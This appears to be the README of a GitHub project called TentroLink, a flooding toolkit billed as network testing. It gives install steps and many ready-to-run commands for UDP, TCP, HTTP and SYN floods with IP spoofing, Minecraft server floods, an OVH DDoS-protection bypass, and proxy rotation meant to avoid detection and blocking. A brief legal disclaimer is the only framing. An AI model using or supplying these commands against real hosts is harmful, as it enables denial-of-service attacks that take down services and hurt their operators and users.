TentroLink is an advanced network testing toolkit designed for legitimate security testing and network resilience evaluation. It provides a comprehensive set of tools for assessing network infrastructure through various methodologies, helping security professionals identify and address potential vulnerabilities.
IMPORTANT: TentroLink is designed and should be used ONLY for authorized network testing, security research, and educational purposes. Usage of this tool against targets without explicit permission is illegal and unethical. The developers of TentroLink assume no liability and are not responsible for any misuse or damage caused by this tool.
You are responsible for your actions. Use this tool responsibly and legally.
NOTE: This project might be not work 100% while trying to flood since the high tech security from the server/website
| Feature | Description |
|---|---|
| πΉ UDP Flooding | DNS attack with payloads |
| πΉ TCP Flooding | Connection handling with pool management |
| πΉ HTTP Flooding | HTTP/HTTPS flooding with custom payloads |
| πΉ TOR2WEB Flooding | Anonymous penetration testing |
| πΉ SYN Flooding | TCP SYN packet flooding with IP spoofing |
| πΉ Minecraft Flooding | Multi-protocol Minecraft server testing |
| πΉ Layer 7 OVH Bypass | OVH-4 protection bypass with adaptive sizing (OVH-1,2,3 coming soon) |
NOTE: Some features like SYN flooding require root/administrator privileges for full capabilities
# Clone the repository
git clone https://github.com/awiones/TentroLink.git
# Navigate to the TentroLink directory
cd TentroLink
# Install required packages
pip install -r requirements.txt
# Verify installation
python main.py --versionpython main.py [attack_method] -t [targets] [options]
| Method | Description | Default Port |
|---|---|---|
udp |
UDP flood operation | 53 |
tcp |
TCP flood operation with connection pooling | 80 |
syn |
SYN flood operation with IP spoofing support | 80 |
http |
HTTP flood operation | 80 |
minecraft |
Minecraft server testing module | 25565 |
ovh |
Layer 7 OVH protection bypass | 80 |
| Option | Description | Default |
|---|---|---|
-t, --targets |
Target specification (IP, domain, CIDR) | Required |
-p, --ports |
Port specification (single, range, named) | Method-specific |
-d, --duration |
Duration in seconds | 60 |
-T, --threads |
Number of threads | Method-specific |
-v, --verbose |
Enable verbose output | False |
--no-color |
Disable colored output | False |
--proxy |
Use proxies (file path or "auto") | None |
--proxy-threads |
Threads for proxy validation | 10 |
# Basic UDP test
python main.py udp -t 192.168.1.1 -p 53 -d 30
# TCP test with multiple ports
python main.py tcp -t 192.168.1.1 -p 80,443 -d 60 -T 10
# SYN flood test with high thread count
python main.py syn -t example.com -p 80 -T 100 -d 60
# Test with automatic proxy acquisition
python main.py udp -t 192.168.1.1 --proxy auto# Basic UDP test with threads
python main.py udp -t 192.168.1.1 -p 53 -d 60 -T 5# Testing multiple ports with increased threads
python main.py tcp -t 192.168.1.1 -p 80,443 -d 60 -T 10# Basic HTTP flood test
python main.py http -t example.com -p 80 --method GET -d 60 -T 10
# HTTP POST flood with increased threads
python main.py http -t example.com -p 80 --method POST -d 60 -T 20
# Custom path with HTTPS
python main.py http -t example.com -p 443 --method GET --path /api/v1/testAdditional options:
--method: HTTP method to use (GET/POST/HEAD, default: GET)--path: Target URL path (default: /)
# Minecraft server testing
python main.py minecraft -t mc.example.com -p 25565 -T 10 -d 60# OVH bypass with optimal configuration
python main.py ovh -t example.com -T 10 -d 60 --path /api/v1Note: Currently, only OVH-4 protection bypass is supported. Support for OVH-1, OVH-2, and OVH-3 will be added in future updates.
# Automatic proxy acquisition
python main.py udp -t 192.168.1.1 --proxy auto
# Using a proxy list file
python main.py udp -t 192.168.1.1 --proxy proxies.txt
# Adjusting proxy validation threads
python main.py udp -t 192.168.1.1 --proxy auto --proxy-threads 20# Testing a CIDR range
python main.py udp -t 192.168.1.0/24 -p 80-100 -d 120# Testing multiple specific targets
python main.py tcp -t 192.168.1.1,192.168.1.2 -p http,https -d 60 -T 20# Basic SYN flood test
python main.py syn -t example.com -p 80 -d 60 -T 50
# Multi-port SYN flooding
python main.py syn -t example.com -p 80,443 -T 100 -d 120
# Skip target validation
python main.py syn -t example.com -p 80 -T 100 -yNote: The SYN flooding module is currently experiencing lower than expected BPS performance. This is being investigated for improvement in future updates.
TentroLink employs multiple sophisticated mechanisms to test network resilience:
- Dynamic payload generation for maximizing test effectiveness
- Intelligent thread management to optimize resource utilization
- Proxy rotation algorithms to prevent detection and blocking
- Real-time performance metrics for comprehensive reporting
TentroLink uses a modular architecture consisting of:
- Core Engine - Manages resources and coordinates testing operations
- Attack Modules - Specialized implementations for different testing methodologies
- Proxy Manager - Handles proxy acquisition, validation, and rotation
- Metrics Collector - Gathers and displays real-time performance data
We welcome contributions from the security research community! Here's how you can help:
- Report bugs: Open an issue on our issues page
- Feature requests: Suggest new features or improvements
- Code contributions: Submit pull requests with enhancements or fixes
- Documentation: Help improve or translate documentation
Please read our Contributing Guidelines before submitting a pull request.
This project is licensed under the MIT License - see the LICENSE file for details.

